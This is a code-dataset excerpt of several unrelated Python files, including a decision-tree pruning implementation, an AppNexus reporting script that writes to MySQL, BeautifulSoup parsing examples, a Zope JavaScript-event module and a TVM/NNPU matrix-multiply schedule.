potential_subtrees = tree_max_sequences[\"subtrees\"]\n\n alpha_cv_errors = []\n for alpha in alphas:\n err_alpha = 0\n for k, cv_tree in enumerate(tree_k_max_list):\n cv_alpha_subtree = DecisionTree.get_subtree_crspnd_to_abtry_alpha(\n cv_tree, alpha, thresh\n )\n err_alpha += DecisionTree.validate(\n cv_alpha_subtree, test_X[k], test_y[k]\n )\n\n alpha_cv_errors.append(err_alpha / k)\n\n alpha_cv_errors = np.array(alpha_cv_errors)\n optimal_index = int(\n np.where(alpha_cv_errors == alpha_cv_errors.min())[0]\n ) # if multiple trees achieve the\n 
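# minimum CV error, the int() cast above fails on a multi-element array; a\n        # defensive variant (an assumption, not part of the original file) is:\n        #   optimal_index = int(np.where(alpha_cv_errors == alpha_cv_errors.min())[0][0])\n        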
optimal_subtree = potential_subtrees[optimal_index]\n optimal_subtree.feature_names = feature_names\n\n return optimal_subtree\n\n # Algorithm Implementation and Fitting Functions\n\n def find_best_splitting_point(self, X, y):\n\n n, p = X.shape\n split_index = None\n split_value = None\n loss = float(\"Inf\")\n\n for var_index in range(p):\n # loop through covariates\n\n x = X[:, var_index]\n sort_index = np.argsort(x)\n sorted_x, sorted_y = x[sort_index], y[sort_index]\n\n for i in range(self._min_leaf - 1, n - self._min_leaf):\n # loop through potential splitting points\n\n xi = sorted_x[i]\n if xi == sorted_x[i + 1]:\n continue\n\n lhs_count, lhs_loss = i + 1, compute_loss(sorted_y[: (i + 1)])\n rhs_count, rhs_loss = n - i - 1, compute_loss(sorted_y[(i + 1) :])\n\n tmp_loss = (\n lhs_count * lhs_loss + rhs_count * rhs_loss\n ) # = SSE_left + SSE_right\n\n if tmp_loss < loss:\n split_index, split_value, loss = var_index, xi, tmp_loss\n\n return split_index, split_value, loss\n\n def fit(self, X, y, min_leaf=5, max_depth=10):\n # Check Input Values\n if self.is_root:\n assert min_leaf >= 1, \"Parameter <> has to be bigger than one.\"\n assert (\n max_depth >= 1\n ), \"Parameter <> has to be bigger or equal than one.\"\n assert len(X) == len(\n y\n ), \"Data <> and <> must have the same number of observations.\"\n assert len(y) >= 2 * min_leaf, (\n \"Data has not enough observations for a single split to occur \"\n \"given value of <>.\"\n )\n\n # Do Stuff for Root\n if self.is_root:\n try:\n self._feature_names = X.columns.values\n except AttributeError:\n pass\n X = coerce_to_ndarray(\n X\n ) # coerce to ndarray (since all following functions expect numpy arrays)\n y = coerce_to_ndarray(y)\n self._num_features = X.shape[1]\n\n # Set Parameters\n self._min_leaf = min_leaf\n self._value = np.mean(y)\n self._y = y\n self._node_loss = np.sum(\n (self._y - self._value) ** 2\n ) # = sum of squared residuals when predicting the mean\n\n # Actual Fitting\n self._split_var, self._split_value, tmp_loss = self.find_best_splitting_point(\n X, y\n )\n self._is_fitted = True\n\n if self._split_var is None:\n self._branch_loss = self._node_loss\n else:\n self._branch_loss = tmp_loss\n\n if self._split_var is not None and max_depth >= 1:\n index = X[:, self._split_var] <= self._split_value\n\n self._left_child = DecisionTree(parent=self)\n self._right_child = DecisionTree(parent=self)\n self._left_child.feature_names = self.feature_names\n self._right_child.feature_names = self.feature_names\n\n self._left_child.fit(X[index], y[index], min_leaf, max_depth - 1)\n self._right_child.fit(X[~index], y[~index], min_leaf, max_depth - 1)\n\n self.update_branch_loss()\n return self\n\n def predict_row(self, xi):\n if self.is_leaf:\n return self._value\n child = (\n self._left_child\n if xi[self._split_var] <= self._split_value\n else self._right_child\n )\n return child.predict_row(xi)\n\n def predict(self, x):\n x = coerce_to_ndarray(x)\n assert (\n self._is_fitted\n ), \"The tree has not yet been fitted; no prediction is possible.\"\n assert (\n x.shape[1] == self._num_features\n ), \"New Data must have the same dimension as the Data used for Fitting.\"\n\n return np.array([self.predict_row(xi) for xi in x])\n\n def plot(self, render=False, save=False, filename=None):\n if filename is None:\n filename = \"decision_tree.svg\"\n dot = Graph(name=\"decision_tree\", filename=filename, format=\"svg\")\n dot.node(\n str(id(self)),\n self.splitting_info_to_string()\n + \"\\nestimate:\"\n + 
str(round(float(self.value), 3)),\n )\n for i in range(self.depth):\n nodes = DecisionTree.get_level_in_list(self, i + 1)\n for node in nodes:\n if node.left_child is None:\n dot.node(\n str(id(node)),\n \"This node is not split\"\n + \"\\nestimate:\"\n + str(round(float(node.value), 3)),\n )\n dot.edge(str(id(node.parent)), str(id(node)))\n else:\n dot.node(\n str(id(node)),\n node.splitting_info_to_string()\n + \"\\nestimate:\"\n + str(round(float(node.value), 3)),\n )\n dot.edge(str(id(node.parent)), str(id(node)))\n if render:\n dot.render(view=True)\n if save:\n dot.save()\n return dot\n\n\n# General Function (Some of which might be static methods in a strict sense)\n\n\ndef pre_order_traverse_tree(root: DecisionTree, func=None) -> list:\n values = []\n if func is None:\n if root is not None:\n values.append(root)\n values.extend(pre_order_traverse_tree(root.left_child))\n values.extend(pre_order_traverse_tree(root.right_child))\n else:\n if root is not None:\n values.append(func(root))\n values.extend(pre_order_traverse_tree(root.left_child, func=func))\n values.extend(pre_order_traverse_tree(root.right_child, func=func))\n return values\n\n\ndef g_value(node: DecisionTree) -> float:\n return (\n float(\"Inf\")\n if node.is_leaf\n else (node.node_loss - node.branch_loss) / (node.number_of_leafs - 1)\n )\n\n\ndef g(branch: DecisionTree) -> tuple:\n nodes = pre_order_traverse_tree(branch)\n values = np.array(pre_order_traverse_tree(branch, g_value))\n minimum = values.min()\n argmin_index = np.where(values == minimum)[0]\n argmin = [nodes[ix] for ix in argmin_index]\n return argmin, minimum\n\n\ndef coerce_to_ndarray(obj) -> np.ndarray:\n if isinstance(obj, np.ndarray):\n return obj\n elif isinstance(obj, (pd.Series, pd.DataFrame)):\n return obj.values\n else:\n raise TypeError(\n \"Object was given with inappropriate type;\"\n \"for matrices and vectors only use pandas Series, DataFrame or \"\n \"Numpy ndarrays\"\n )\n\n\ndef compute_loss(y, loss_func=None) -> float:\n if loss_func is None:\n loss = np.var(y)\n else:\n loss = loss_func(y)\n\n if loss is None:\n raise ValueError(\"Loss function cannot be computed on the outcome vector.\")\n else:\n return float(loss)\n\n\ndef test_monotonicity_list(lst: list, strictly=True) -> bool:\n if strictly:\n return all(x < y for x, y in zip(lst, lst[1:]))\n else:\n return all(x <= y for x, y in zip(lst, lst[1:]))\n","sub_path":"causal_tree/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":17943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"471247715","text":"#!/usr/bin/env python\nimport requests\nimport urllib\nimport json\nimport ConfigParser\nimport MySQLdb\n\nconfig = ConfigParser.RawConfigParser()\nconfig.read('appnexus-default.properties')\n\n\nclass AppNexusBasicStats:\n \"\"\"Gets AppNexus basic stats (impressions and revenue) and writes them to a MySQL table\"\"\"\n\n def __init__(self):\n\n # The possible named report intervals are documented here: https://wiki.appnexus.com/display/api/Report+Service\n # Search on the page for \"report_interval\"\n self.report_interval = \"today\"\n\n self.authenticate()\n self.connectToDB()\n self.createTable()\n self.createReportChunkUrls()\n self.makeCallsAndWriteToDB()\n\n def authenticate(self):\n self.s = requests.session()\n credentials = json.dumps(\n {'auth': {'username': config.get('appnexus', 'username'), 'password': config.get('appnexus', 'password')}})\n 
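# The shared requests session (self.s) keeps whatever cookies the /auth\n        # response sets, which is what authenticates the report calls made\n        # through the same session later on.\n        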
self.s.post(url=\"https://api.appnexus.com/auth\", data=credentials)\n\n def connectToDB(self):\n self.con = MySQLdb.connect(host=config.get('database', 'host'), db=config.get('database', 'db'),\n user=config.get('database', 'username'), passwd=config.get('database', 'password'))\n\n def createTable(self):\n sql = \"DROP TABLE IF EXISTS appnexus_basic_stats\"\n self.cursor = self.con.cursor()\n self.cursor.execute(sql)\n sql = \"CREATE TABLE appnexus_basic_stats (publisher_id int, publisher_name varchar(255), impressions bigint, revenue decimal(15, 5))\"\n self.cursor.execute(sql)\n\n def createReportChunkUrls(self):\n response = self.s.get(url=\"http://api.appnexus.com/publisher\")\n response_count = json.loads(response.content)['response']['count']\n start_elements = [start_element for start_element in range(0, response_count, 100)]\n self.urls = []\n for start_element in start_elements:\n url = \"http://api.appnexus.com/publisher?\" + urllib.urlencode(\n {\"state\": \"active\", \"interval\": self.report_interval, \"sort\": \"imps.desc\", \"stats\": \"true\",\n \"object_status\": \"true\", \"is_rtb\": \"false\", \"start_element\": start_element, \"num_elements\": \"100\"})\n self.urls.append(url)\n\n def makeCallsAndWriteToDB(self):\n for url in self.urls:\n response = self.s.get(url=url)\n\n for publisher in json.loads(response.content)['response']['publishers']:\n\n id = publisher['id']\n name = publisher['name']\n imps = publisher['stats']['imps']\n revenue = publisher['stats']['revenue']\n\n if imps == None:\n imps = 0\n\n if revenue == None:\n revenue = 0\n\n sql = \"\"\"INSERT INTO appnexus_basic_stats (publisher_id, publisher_name, impressions, revenue) VALUES ({0}, {1}, {2}, {3})\"\"\".format(\n id, json.dumps(name), imps, revenue)\n self.cursor.execute(sql)\n\n self.cursor.execute('commit')\n\nif __name__ == \"__main__\":\n appNexusBasicStats = AppNexusBasicStats()\n","sub_path":"appnexus_basic_stats.py","file_name":"appnexus_basic_stats.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600472551","text":"from bs4 import BeautifulSoup\n\n# from file\npath = 'datas/sample03.html'\n\nwith open(path) as fp:\t\t\t\t\t\t# shared github\n soup = BeautifulSoup(fp, features='lxml')\n title_data = soup.find('h1')\t\t\t\t\t\t\t\t\t# tag로 검색\n print(type(title_data), title_data, title_data.string)\n title_data = soup.find_all(id='h1_id_name')\t\t\t\t\t# id로 검색\n print(title_data, title_data[0].get_text())\n title_data = soup.find_all('p', class_='public_class_name')\t# tag와 class로 검색\n print(title_data, title_data[0].attrs)\n # [
<p class=\"public_class_name\" id=\"p01_id_name\">웹페이지에서 ... 하는 것</p>
]\n # {'class': ['public_class_name'], 'id': 'p01_id_name'}\n title_data = soup.find_all('p', attrs = {'align': 'center'})\t\t# 속성:속성값으로 검색\n print(title_data, title_data[0].string)\n title_data = soup.find_all('a', href=True)\t\t\t\t\t# 속성 존재 여부 검색\n print(title_data, title_data[0].string)\n\n\nwith open(path) as fp:\n soup = BeautifulSoup(fp, features='lxml')\n print(type(soup), soup.attrs, soup.getText())\n # {} The Dormouse's story ...\n\n elements = soup.findAll(name='a')\n print(type(elements), len(list(elements)))\n # 3\n for element in elements:\n print(type(element), element.attrs, element['href'])\n print(element.getText(), len(element.getText())) # need trip()\n # {'class': ['sister']...} http://example01.com/elsie Elsie 14\n # ...\n \n body_tag = soup.body\n bodychildren = body_tag.children\n print(type(bodychildren), len(list(bodychildren)))\n # 7\n \n from bs4.element import NavigableString\n for child in body_tag.children:\n if isinstance(child, NavigableString):\n print(type(child), repr(child.string), len(child.string))\n else:\n print(type(child), child.attrs, child.getText(), len(child.getText()))\n # '\\n' 1\n # {'class': ['title']} \n # The Dormouse's story\n # ...\n # ","sub_path":"codes/beatifulsoups/getAttrsandText.py","file_name":"getAttrsandText.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"296614504","text":"##############################################################################\n#\n# Copyright (c) 2007 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Javascript Form Framework Event Framework.\n\n$Id: $\n\"\"\"\n__docformat__ = \"reStructuredText\"\nimport sys\nimport zope.component\nimport zope.interface\nfrom zope.publisher.interfaces.browser import IBrowserRequest\nfrom zope.viewlet import viewlet\n\nfrom z3c.formjs import interfaces\n\n\nclass JSEvent(object):\n \"\"\"Javascript Event\"\"\"\n zope.interface.implements(interfaces.IJSEvent)\n\n def __init__(self, name):\n self.name = name\n\n def __repr__(self):\n return '' % self.name\n\n\nCLICK = JSEvent(\"click\")\nDBLCLICK = JSEvent(\"dblclick\")\nCHANGE = JSEvent(\"change\")\nLOAD = JSEvent(\"load\")\nBLUR = JSEvent(\"blur\")\nFOCUS = JSEvent(\"focus\")\nKEYDOWN = JSEvent(\"keydown\")\nKEYUP = JSEvent(\"keyup\")\nMOUSEDOWN = JSEvent(\"mousedown\")\nMOUSEMOVE = JSEvent(\"mousemove\")\nMOUSEOUT = JSEvent(\"mouseout\")\nMOUSEOVER = JSEvent(\"mouseover\")\nMOUSEUP = JSEvent(\"mouseup\")\nRESIZE = JSEvent(\"resize\")\nSELECT = JSEvent(\"select\")\nSUBMIT = JSEvent(\"submit\")\n\nEVENTS = (CLICK, DBLCLICK, CHANGE, LOAD, BLUR, FOCUS, KEYDOWN, KEYUP,\n MOUSEDOWN, MOUSEMOVE, MOUSEOUT, MOUSEOVER, MOUSEUP, RESIZE, SELECT,\n SUBMIT)\n\nclass IdSelector(object):\n zope.interface.implements(interfaces.IIdSelector)\n\n def __init__(self, id):\n self.id = id\n\n def __repr__(self):\n return '<%s \"%s\">' %(self.__class__.__name__, self.id)\n\n\nclass CSSSelector(object):\n 
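# Counterpart to IdSelector: matches DOM nodes by a CSS expression, e.g.\n    # @subscribe(CSSSelector('div.row a'), event=DBLCLICK) on a handler method.\n    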
zope.interface.implements(interfaces.ICSSSelector)\n\n def __init__(self, expr):\n self.expr = expr\n\n def __repr__(self):\n return '<%s \"%s\">' %(self.__class__.__name__, self.expr)\n\n\nclass JSSubscription(object):\n zope.interface.implements(interfaces.IJSSubscription)\n\n def __init__(self, event, selector, handler):\n self.event = event\n self.selector = selector\n self.handler = handler\n\n def __repr__(self):\n return '<%s event=%r, selector=%r, handler=%r>' % (\n self.__class__.__name__, self.event, self.selector, self.handler)\n\n\nclass JSSubscriptions(object):\n zope.interface.implements(interfaces.IJSSubscriptions)\n\n def __init__(self):\n self._subscriptions = []\n\n def subscribe(self, event, selector, handler):\n subscription = JSSubscription(event, selector, handler)\n self._subscriptions.append(subscription)\n return subscription\n\n def __iter__(self):\n return iter(self._subscriptions)\n\n\ndef subscribe(selector, event=CLICK):\n \"\"\"A decorator for defining a javascript event handler.\"\"\"\n def createSubscription(func):\n frame = sys._getframe(1)\n f_locals = frame.f_locals\n subs = f_locals.setdefault('jsSubscriptions', JSSubscriptions())\n return subs.subscribe(event, selector, func)\n return createSubscription\n\n\nclass JSSubscriptionsViewlet(viewlet.ViewletBase):\n \"\"\"An viewlet for the JS viewlet manager rendering subscriptions.\"\"\"\n zope.component.adapts(\n zope.interface.Interface,\n IBrowserRequest,\n interfaces.IHaveJSSubscriptions,\n zope.interface.Interface)\n\n # This viewlet wants to be very heavy, so that it is rendered after all\n # the JS libraries are loaded.\n weight = 1000\n\n def update(self):\n self.renderer = zope.component.getMultiAdapter(\n (self.__parent__.jsSubscriptions, self.request),\n interfaces.IRenderer)\n self.renderer.update()\n\n def render(self):\n content = self.renderer.render()\n return u'' % content\n","sub_path":"z3c.formjs/tags/0.2.1/src/z3c/formjs/jsevent.py","file_name":"jsevent.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"284391548","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom puzzle.models.dotdict import DotDict\n\nlogger = logging.getLogger(__name__)\n\n\nclass Plugin(object):\n \"\"\"docstring for Plugin\"\"\"\n def __init__(self):\n super(Plugin, self).__init__()\n self.db = None\n self.puzzle_db = None\n self.individuals = None\n self.case_obj = None\n self.variant_type = 'snv'\n self.filters = DotDict(\n can_filter_frequency=False,\n can_filter_cadd=False,\n can_filter_consequence=False,\n can_filter_gene=False,\n can_filter_inheritance=False,\n can_filter_sv=False\n )\n\n def init_app(self, app):\n \"\"\"Initialize plugin via Flask.\"\"\"\n self.root_path = app.config['PUZZLE_ROOT']\n self.pattern = app.config['PUZZLE_PATTERN']\n\n def cases(self, pattern=None):\n \"\"\"Return all cases.\"\"\"\n raise NotImplementedError\n\n def variants(self, case_id, skip=0, count=30, filters=None):\n \"\"\"Return count variants for a case.\n\n \"\"\"\n raise NotImplementedError\n\n def variant(self, variant_id):\n \"\"\"Return a specific variant.\"\"\"\n raise NotImplementedError\n\n def individual_dict(self, ind_ids):\n \"\"\"Return a dict with ind_id as key and Individual as values.\"\"\"\n ind_dict = {ind.ind_id: ind for ind in self.individuals(ind_ids=ind_ids)}\n return 
ind_dict\n","sub_path":"puzzle/plugins/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"548455704","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 11 12:03:09 2020\n\n@author: ptruong\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\nfrom constants import get_log2FC_ratio_matrices\n\ndef get_differentially_expressed_proteins_from_log2FC_df(method, sample1, sample2, specie, ratio, two_sided = False):\n \"\"\"\n Takes log2FC df from get_log2FC_matrix() and computes differentially expressed \n proteins for each run.\n \n example params:\n \n method = \"triq\" # VAR\n sample1 = \"S02\" # VAR\n sample2 = \"S06\" # VAR\n specie = \"HUMAN\" # VAR\n ratio = 0.8 # VAR - ratio for what is considered diff. exp.\n two_sided = False # VAR - is this needed? I will skip this for now\n \n NOTE: two_sided does nothing atm. left for furutre fix.\n \"\"\"\n ARATH_FC_matrix, CAEEL_FC_matrix, HUMAN_FC_matrix = get_log2FC_ratio_matrices()\n \n if specie == \"HUMAN\":\n FC_matrix = HUMAN_FC_matrix\n FC_treshold = ratio * FC_matrix[sample2][sample1] #The smaples are reversed because the log2FC in this function is reversed.\n file_name = method+\"_\"+\"log2FC\"+\"_\"+sample1+\"_\"+sample2+\"_\"+specie+\".csv\"\n df_log2FC = pd.read_csv(file_name, sep = \"\\t\")\n diffExp = np.sum(df_log2FC[df_log2FC > FC_treshold] > 0) #This comparison should be more then\n elif specie == \"ARATH\":\n FC_matrix = ARATH_FC_matrix\n FC_treshold = ratio * FC_matrix[sample2][sample1] #The smaples are reversed because the log2FC in this function is reversed.\n file_name = method+\"_\"+\"log2FC\"+\"_\"+sample1+\"_\"+sample2+\"_\"+specie+\".csv\"\n df_log2FC = pd.read_csv(file_name, sep = \"\\t\")\n diffExp = np.sum(df_log2FC[df_log2FC < -ratio] > 0) + np.sum(df_log2FC[df_log2FC > ratio] > 0) #This comparison should be if less or more than ratio\n elif specie == \"CAEEL\":\n FC_matrix = CAEEL_FC_matrix\n FC_treshold = ratio * FC_matrix[sample2][sample1] #The smaples are reversed because the log2FC in this function is reversed.\n file_name = method+\"_\"+\"log2FC\"+\"_\"+sample1+\"_\"+sample2+\"_\"+specie+\".csv\"\n df_log2FC = pd.read_csv(file_name, sep = \"\\t\")\n diffExp = np.sum(df_log2FC[df_log2FC < FC_treshold] > 0) #This comparison should be less than\n else:\n print(\"no species specificed\")\n # return \n return diffExp\n","sub_path":"bin/log2fc_from_melt_computation.py","file_name":"log2fc_from_melt_computation.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"360942619","text":"# yaaddda ya\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon\npts = np.array([[0,0], [4,0], [2, np.sqrt(5**2 - 2**2)]])\np = Polygon(pts, closed=True)\nax = plt.gca()\nax.add_patch(p)\nax.set_xlim(0,4)\nax.set_ylim(0,5)\nplt.show()\n","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"343509788","text":"#!/usr/bin/env python\nimport sys\nimport itertools\n\nfrom roehrenkonstruktion import Roehrenkonstruktion\nfrom util import Vector\n\ndef readPoint(line):\n point = line.split()\n return Vector(float(point[0]), float(point[1]))\n\ndef readFile(filename):\n f = open(filename, \"r\")\n lines = f.read().splitlines()\n 
project_name = lines[0]\n start_point = readPoint(lines[1])\n initial_dir = readPoint(lines[2])\n goal_point = readPoint(lines[3])\n\n return project_name, start_point, initial_dir, goal_point\n\ndef generate_str(project_name, tubes, cost):\n stringarray = [\"reset\", \"set size ratio -1\", 'set title \"{}, Kosten: {}\"'.format(project_name, cost),\n \"set key off\", \"plot '-' using 1:2:3:4 with vectors filled head lc 0\"]\n for line in tubes:\n stringarray.append(\" \".join(map(str, itertools.chain(*line[:-1])) + [\"#\", line[-1]]))\n return \"\\n\".join(stringarray)\n\ndef writetoFile(str_to_write, filename, end=\".out\"):\n filename = filename.rsplit(\".\",1)[0] + end\n f = open(filename, \"w\")\n f.write(str_to_write)\n f.close()\n\ndef run(filename):\n project_name, start_point, initial_dir, goal_point = readFile(filename)\n problem = Roehrenkonstruktion()\n solution = problem.solveProblem(start_point, initial_dir, goal_point)\n return generate_str(project_name, solution[:-1], solution[-1])\n\nif __name__ == \"__main__\":\n for arg in sys.argv[1:]:\n res_str = run(arg)\n writetoFile(res_str, arg)\n\n\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"473443857","text":"from instagram.entities import Account, Comment, Location, Media, Story, Tag\nimport pytest\nfrom random import randint, choice\nfrom string import ascii_uppercase, ascii_lowercase, digits\n\n\ndef setup_function():\n Account.clear_cache()\n Comment.clear_cache()\n Location.clear_cache()\n Media.clear_cache()\n Story.clear_cache()\n Tag.clear_cache()\n\n\ndef id():\n return \"\".join(\n choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(randint(1, 50))\n )\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_account(id):\n account = Account(id)\n assert Account.cache == {id: account}\n\n Account.clear_cache()\n assert Account.cache == dict()\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_media(id):\n media = Media(id)\n assert Media.cache == {id: media}\n\n Media.clear_cache() \n assert Media.cache == dict()\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_location(id):\n location = Location(id)\n assert Location.cache == {id: location}\n\n Location.clear_cache()\n assert Location.cache == dict()\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_tag(id):\n tag = Tag(id)\n assert Tag.cache == {id: tag}\n\n Tag.clear_cache()\n assert Tag.cache == dict()\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_comment(id):\n account = Account(\"test\")\n media = Media(\"test\")\n comment = Comment(id, media=media, owner=account, text=\"test\", created_at=0)\n assert Comment.cache == {id: comment} \n\n Comment.clear_cache()\n assert Comment.cache == dict()\n assert Media.cache == {\"test\": media}\n assert Account.cache == {\"test\": account}\n\n\n@pytest.mark.parametrize(\"id\", [id() for _ in range(3)])\ndef test_clear_cache_story(id):\n story = Story(id)\n assert Story.cache == {id: story}\n \n Story.clear_cache()\n assert Story.cache == dict()\n","sub_path":"tests/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"720271","text":"import nnpu\nimport 
tvm\nimport topi\nfrom nnpu.utils import ScheduleProcHelper\nimport numpy as np\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='test of NNPU Op')\nparser.add_argument('--sim', type=str, help='the simulator to use', \n default='S0', choices=['S0', 'S1', 'SC'])\nargs = parser.parse_args()\n\ncfg_path = './nnpu_config.davinci.yaml'\ngemm_shape = (8, 8, 8)\ndim_x, dim_y = 16, 8\nfactor_x, factor_y = 1, 8 # to split outter loop\n\nwith ScheduleProcHelper(), nnpu.Environment(cfg_path):\n env = nnpu.get_env()\n nnpu.set_device(env, type=args.sim)\n shape1 = (128, 1024)\n shape2 = (1024, 1024)\n\n factor = gemm_shape[1]\n assert shape1[1] == shape2[1], \\\n 'gemm do dot product between rows, so the shape[1] of inputs should match'\n assert shape1[0] % gemm_shape[0] == 0, 'gemm insn require size of input 1 be x{0}'.format(gemm_shape[0])\n assert shape2[0] % gemm_shape[2] == 0, 'gemm insn require size of input 2 be x{0}'.format(gemm_shape[0])\n assert shape1[1] % factor == 0, 'gemm insn requires size of reduce dim be multiples of {0}'.format(factor)\n\n dtype_n, dtype_w = env.cfg['dtype_n'], env.cfg['dtype_w']\n \n a = tvm.placeholder(shape1, dtype_n, 'a')\n b = tvm.placeholder(shape2, dtype_n, 'b')\n bias = tvm.placeholder((shape2[0],), dtype_w, 'bias')\n\n shape1_tiled = (shape1[0] // gemm_shape[0], shape1[1] // factor, \n gemm_shape[0], factor)\n shape2_tiled = (shape2[0] // gemm_shape[2], shape2[1] // factor,\n gemm_shape[2], factor)\n a_buf = tvm.compute(shape1_tiled, lambda no, ico, ni, ici: a[no * gemm_shape[0] + ni, ico * factor + ici], 'a_buf')\n b_buf = tvm.compute(shape2_tiled, lambda oco, ico, oci, ici: b[oco * gemm_shape[2] + oci, ico * factor + ici], 'b_buf')\n\n out_shape_tiled = (shape1_tiled[0], shape2_tiled[0], shape1_tiled[2], shape2_tiled[2])\n ko = tvm.reduce_axis((0, shape1[1] // factor), 'ko')\n ki = tvm.reduce_axis((0, factor), 'ki')\n\n out_buf = tvm.compute(out_shape_tiled, \n lambda xo, yo, xi, yi:\n tvm.sum(a_buf[xo, ko, xi, ki].astype(dtype_w) \n * b_buf[yo, ko, yi, ki].astype(dtype_w),\n axis=[ko, ki]),\n 'out_buf')\n # out_buf = tvm.compute(out_shape_tiled, lambda *i: out_acc(*i), 'out_buf')\n res_buf = tvm.compute(out_shape_tiled, lambda no, oco, ni, oci: (out_buf[no, oco, ni, oci] + bias[oco * factor + oci]).astype(dtype_n), 'res_buf')\n res_l0 = tvm.compute(out_shape_tiled, lambda *i: res_buf(*i), 'res_l0')\n out_host = tvm.compute(out_shape_tiled, lambda *i: res_l0(*i), 'out_host')\n\n # schedule\n out_acc = out_buf\n s = nnpu.create_schedule(out_host.op)\n al_scope = 'buffer1'\n bl_scope = 'buffer2'\n al = s.cache_read(a_buf, env.get_scope(al_scope), out_acc)\n bl = s.cache_read(b_buf, env.get_scope(bl_scope), out_acc)\n bias_buf = s.cache_read(bias, env.get_scope('buffer4'), res_buf)\n\n # set scope\n s[a_buf].set_scope(env.get_scope('buffer0'))\n s[b_buf].set_scope(env.get_scope('buffer0'))\n s[out_buf].set_scope(env.get_scope('buffer3'))\n s[bias_buf].set_scope(env.get_scope('buffer5'))\n s[res_buf].set_scope(env.get_scope('buffer4'))\n s[res_l0].set_scope(env.get_scope('buffer0'))\n # s[out_acc].set_scope(env.get_scope('acc'))\n\n # pragma read\n s[a_buf].pragma(a_buf.op.axis[0], env.dma_copy_to_buf)\n s[b_buf].pragma(b_buf.op.axis[0], env.dma_copy_to_buf)\n s[bias_buf].pragma(bias_buf.op.axis[0], env.dma_copy_to_buf)\n s[al].pragma(al.op.axis[0], env.scratchpad_copy)\n s[bl].pragma(bl.op.axis[0], env.scratchpad_copy)\n s[res_l0].pragma(res_l0.op.axis[0], env.scratchpad_copy)\n # s[out_buf].pragma(out_buf.op.axis[0], env.copy_acc2buf)\n\n # 
tensorize\n # out_acc = out_buf\n xo, yo, xi, yi = out_acc.op.axis\n ko, ki = out_acc.op.reduce_axis\n koo, koi = s[out_acc].split(ko, 4) # a schedule argument\n s[out_acc].reorder(koo, xo, yo, koi, xi, yi, ki)\n s[out_acc].tensorize(xi, env.intrins.get('GEMM', shape=gemm_shape, mode='inc', \n scope_out='buffer3', scope_in1='buffer1',\n scope_in2='buffer2'))\n s[b_buf].compute_at(s[out_acc], koo)\n s[al].compute_at(s[out_acc], koo)\n s[bl].compute_at(s[out_acc], koo)\n\n # tensorize add bias\n s[res_buf].tensorize(res_buf.op.axis[2], \n env.intrins.get('MAddV', shape=(gemm_shape[0], gemm_shape[2]),\n scope_in_mat='buffer3', scope_in_vctr='buffer5', scope_out='buffer4', mode='dec'))\n\n # split output\n xo, yo, tx, ty = out_host.op.axis\n # this the the rows of matrix loaded to faster scratchpad\n vt, yo = s[out_host].split(yo, nparts=2)\n l1_x, l1_y = 16, 64\n xl1, yl1, xi, yi = s[out_host].tile(xo, yo, l1_x, l1_y)\n l0_x, l0_y = 16, 64\n xl0, yl0, xi, yi = s[out_host].tile(xi, yi, l0_x, l0_y)\n\n s[out_host].reorder(vt, xl1, yl1, xl0, yl0, xi, yi, tx, ty)\n s[out_host].pragma(xi, env.dma_copy_from_buf)\n\n # bind to virtual thread\n s[out_host].bind(vt, tvm.thread_axis(\"cthread\"))\n\n # compute_at\n s[a_buf].compute_at(s[out_host], xl1)\n # s[b_buf].compute_at(s[out_host], yl0)\n # s[out_acc].compute_at(s[out_host], yl0)\n s[out_buf].compute_at(s[out_host], yl0)\n s[res_buf].compute_at(s[out_host], yl0)\n s[res_l0].compute_at(s[out_host], yl0)\n s[bias_buf].compute_at(s[out_host], vt)\n\n print(nnpu.lower(s, [a, b, bias, out_host], simple_mode=True))\n # exit(0)\n func = nnpu.build(s, [a, b, bias, out_host], 'nnpu', 'llvm', 'nnpu_func')\n print('------------------- device module 1 TVM IR: ')\n 